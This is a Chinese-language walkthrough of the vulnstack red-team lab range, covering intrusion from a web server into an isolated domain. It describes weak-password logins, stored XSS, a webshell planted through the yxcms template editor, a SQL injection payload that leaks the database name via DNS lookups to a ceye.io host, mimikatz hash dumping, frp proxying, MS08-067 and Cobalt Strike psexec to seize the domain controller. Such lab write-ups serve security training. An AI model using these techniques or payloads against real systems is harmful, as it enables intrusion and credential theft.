[内网渗透]vulstack红队评估(一)

简介: 根据作者公开的靶机信息整理:虚拟机初始所有统一密码:hongrisec@2019 因为登陆前要修改密码,改为了panda666...

一、环境搭建:

1、根据作者公开的靶机信息整理:

虚拟机初始所有统一密码:hongrisec@2019

 

因为登陆前要修改密码,改为了panda666...

 

2、虚拟网卡网络配置:

①Win7双网卡模拟内外网:

外网:192.168.1.43,桥接模式与物理机相通

内网:192.168.52.143

 

还需要修改以下网络配置,将网段设置好

 

②Win2003只有内网:

内网:192.168.52.138,仅主机模式

 

③Win2008只有内网:

内网:192.168.52.141,仅主机模式

 

④攻击机:

kali:192.168.1.2

win10:192.168.1.7

 

然后启动Phpstudy即可开启web服务

 

 

二、Web层渗透:

1、信息收集:

①服务和端口

 

访问80端口的http服务,发现php探针,收集一些有用的信息:

绝对路径:C:/phpStudy/WWW

 

②目录扫描

发现phpmyadmin、beifen.rar文件

 

访问phpmyadmin页面,手动试了常见的弱口令,root/root进去了

 

查看是否可以intoutfile直接写入一句话,但secure_file_priv为NULL所以不能指定写入的路径,先放一下,看看备份文件有什么可利用的


SHOW VARIABLES LIKE '%secure%'


 

访问文件路径,把备份文件下载

 

发现是yxcms的源码备份文件

 

并且通过升级日志,知道版本为1.2.1

 

 

2、漏洞挖掘:

①存储型XSS:

留言板处,输入xss payload,点击留言:

 

②信息泄露+弱口令进后台:

 

访问后台地址,输入默认账号密码:admin/123456,查看留言是,发现刚才的xss payload执行了,get√ N0.1

 

③任意文件写入漏洞:

前台模板-->管理模板文件

 

点击新建

 

直接写入一句话木马,然后保存

 

根据备份文件,找到模板文件的存放路径

 

访问文件,成功getshell

 

④delete注入:

勾选删除碎片时,用burp抓包

 

加入单引号发现会报错

 

网上找的payload,具体就不进行测试了:


and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\abc'))),1,1))--

 

 

⑤还可以通过phpmyadmin全局日志getshell,具体方法也很简单,就不演示了

 

 


三、内网渗透

1、win7本机信息收集

已经成功getshell了,使用蚁剑连接,准备进行内网渗透,为了熟悉MSF,所以打算使用MSF进行

①上传木马并执行

成功拿到meterpreter的会话

 

直接利用getsystem提权(因为没有uac限制)

 

②内网信息收集

发现有域环境:god.org,内网ip为192.168.52.143,DNS服务器(一般是域控):192.168.52.138

 

添加路由进行横向移动

 

利用frp搭建socks代理

上传frp客户端及配置文件到目标机器

 

启动服务端

 

这里我利用蚁剑直接执行客户端,因为msf执行有点问题没解决...

 

探测域内存活主机:


run windows/gather/enum_ad_computers

 

域控列表


run windows/gather/enum_domains

 

所有存活主机

 

dump当前机器的所有hash



load mimikatzmsv

 


kerberos

 

信息整理:




域控2008:OWA.god.org 192.168.52.138
域机器2003:root-tvi862ubeh.god.org 192.168.52.141
web服务器win7:192.168.52.143

 

密码hash整理:


Administrator:ntlm:bd692185c355484e973645bd6a8e4505 明文:panda666...

 

 

2、横向移动拿下域控:

①ms08067(注意payload使用bind),成功拿下win2003域机器

 

②利用CobaltStrike的psexec拿下域控

1.将msf的会话派生给CS,然后抓取凭证,利用smb beacon上线域控

 

成功拿下域控beacon

 

2.转储域内所有hash

 

四、总结:

①通过目录扫描得到备份文件,利用yxcms历史漏洞getshell

②利用msf进行常规内网信息收集

③添加路由+frp搭建socks代理进行内网横向移动

④通过ms08-067漏洞拿下03域机器

⑤利用CS的smb beacon成功拿下域控权限

目录
相关文章
|
4月前
|
人工智能 安全 Shell
在 Moltbot (Clawdbot) 里配置调用阿里云百炼 API 完整教程
Moltbot(原Clawdbot)是一款开源AI个人助手,支持通过自然语言控制设备、处理自动化任务,兼容Qwen、Claude、GPT等主流大语言模型。若需在Moltbot中调用阿里云百炼提供的模型能力(如通义千问3系列),需完成API配置、环境变量设置、配置文件编辑等步骤。本文将严格遵循原教程逻辑,用通俗易懂的语言拆解完整流程,涵盖前置条件、安装部署、API获取、配置验证等核心环节,确保不改变原意且无营销表述。
4019 6
|
人工智能 安全 生物认证
AI-Infra-Guard:腾讯开源AI基础设施安全评估神器,一键扫描漏洞
AI-Infra-Guard 是腾讯开源的高效、轻量级 AI 基础设施安全评估工具,支持 28 种 AI 框架指纹识别和 200 多个安全漏洞数据库,帮助用户快速检测和修复 AI 系统中的安全风险。
1703 7
|
测试技术
优化if-else的11种方案
优雅编码不仅提升程序效率,也增进代码可读性与维护性。通过早返回减少嵌套逻辑、运用三元运算符简化条件判断、采用`switch-case`优化多分支结构、实施策略模式灵活应对不同情境、利用查找表快速定位处理方式、封装函数明确职责划分、应用命令模式解耦操作与调用、引入状态模式管理复杂状态变化、重构条件表达式以增强清晰度、运用断言确保前提条件、及合理异常处理等十大技巧,使代码更加精炼与优雅。
746 159
优化if-else的11种方案
|
机器学习/深度学习 人工智能 并行计算
一文了解火爆的DeepSeek R1 | AIGC
DeepSeek R1是由DeepSeek公司推出的一款基于强化学习的开源推理模型,无需依赖监督微调或人工标注数据。它在数学、代码和自然语言推理任务上表现出色,具备低成本、高效率和多语言支持等优势,广泛应用于教育辅导、金融分析等领域。DeepSeek R1通过长链推理、多语言支持和高效部署等功能,显著提升了复杂任务的推理准确性,并且其创新的群体相对策略优化(GRPO)算法进一步提高了训练效率和稳定性。此外,DeepSeek R1的成本低至OpenAI同类产品的3%左右,为用户提供了更高的性价比。
3366 11
|
云安全 机器学习/深度学习 人工智能
课时12:阿里云安全产品之态势感知
阿里云态势感知是基于人工智能的安全产品,帮助企业应对高隐蔽性网络攻击。它通过机器学习全面感知网络威胁,覆盖网络层、主机层和应用层,提供实时入侵检测与响应。具备威胁模型、专家定制、超强检索及全网威胁情报等六大核心优势,显著增强企业网络安全防御能力。在G20峰会期间,成功实现平台用户网站安全运营零干扰。
740 0
|
小程序 JavaScript Android开发
基于微信小程序渗透-反编译小程序
微信小程序渗透时,因为小程序没有网页端页面,所以不能直接访问抓包分析,如果需要抓包分析,那么一般就是用电脑上的安卓模拟器登录微信利用burp抓包、要么就是用burp抓手机的包、要么就是从手机上直接抓包。方式方法有很多种,个人一般用来抓包的工具也就是IOS上用 Stream软件,或者是Postman等工具很容易就抓包了。
845 1
|
Python
使用Python计算字符串的SHA-256散列值
使用Python计算字符串的SHA-256散列值
511 7
|
XML 前端开发 Java
springMVC01,【第一个springMVC例子(注解版):HelloWorld】
文章介绍了如何使用注解配置创建第一个SpringMVC项目,并讲解了SpringMVC的执行流程,包括配置web.xml、编写springmvc-servlet.xml配置文件、创建带有@RequestMapping注解的控制器层以及运行测试和执行流程小结。
|
安全 关系型数据库 MySQL
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)
1678 1
看完这篇 教你玩转ATT&CK红队评估实战靶场Vulnstack(三)